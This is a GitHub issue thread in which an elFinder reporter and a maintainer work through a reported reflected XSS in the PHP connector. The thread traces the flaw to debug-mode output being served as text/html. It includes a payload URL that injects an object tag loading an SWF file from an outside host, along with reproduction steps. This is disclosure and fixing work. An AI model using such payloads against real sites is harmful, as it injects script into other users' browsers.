### ISSUE TITLE
Possible XSS issue

### ISSUE THREAD

**Issue by dleffler** [Studio-42/elFinder#1975]
I've been notified of an XSS security vulnerability within elFinder. The fix is to add htmlspecialchars($data) into line 309 of elFinderConnector.class.php to filter the json output.
``` php
    $out = json_encode(htmlspecialchars($data));
```
I have additional details including the payload and other research as sent to me by chengable

**Comment by nao-pon** [comment]
@dleffler Since sends data from the connector may contain HTML tags, we can not accept this proposal. Please sanitize your own data separately. Or use `fm.escape()` to escape on client side.

**Comment by dleffler** [comment]
Perhaps the fix given to me wasn't the real fix...here is the payload:
```
localhost/connector.php?cmd=open&target=l1_asdl<object%2
0allowscriptaccess=always>%20<param%20name=url%20value=http%3A%2F%2F
mhz.pw%2Fgame%2Fxss%2Falert.swf>

**Comment by nao-pon** [comment]
Give that payload to the elFinder connector, the next response will be returned.

> `{"error":["errOpen","#l1_asdl<object allowscriptaccess=always> <param name=url value=http:\/\/mhz.pw\/game\/xss\/alert.swf>","errFolderNotFound"]}`

This is the error dialog displayed by that data.

![fireshot capture 5 - test here_elfinder 2 1_ - https___hypweb net_elfinder-nightly_demo_develop_](https://cloud.githubusercontent.com/assets/1412630/25229907/29bee85e-260d-11e7-8de1-eda5cf836d53.png)

It does not seem to be vulnerable to XSS.

**Comment by dleffler** [comment]
This seems to only occur when 'debug' is turned ON (where the output is not escaped). With a test setup 
```
http://localhost/elFinder/php/connector.php?cmd=open&target=l1_asdl<object%2
0allowscriptaccess=always>%20<param%20name=url%20value=http%3A%2F%2F
mhz.pw%2Fgame%2Fxss%2Falert.swf>

**Comment by nao-pon** [comment]
I am testing in debug mode, but I can not reproduce this problem.
Could you explain the detailed procedure to reproduce this problem?

**Comment by dleffler** [comment]
1. extract elFinder into your web folder into folder named 'elFinder'
2. rename php/connector.php.dist to connector.php
3. browse to the above url in your browser

The issue will not appear with connector.minimal.php.dist since debug is not passed to elFinderConnector. It appears the issue is if you force json output as text/html.

**Comment by nao-pon** [comment]
Yes, I understood. I was checking the display on the wlFinder client. `text/plain` should be returned in the content type when debugging.
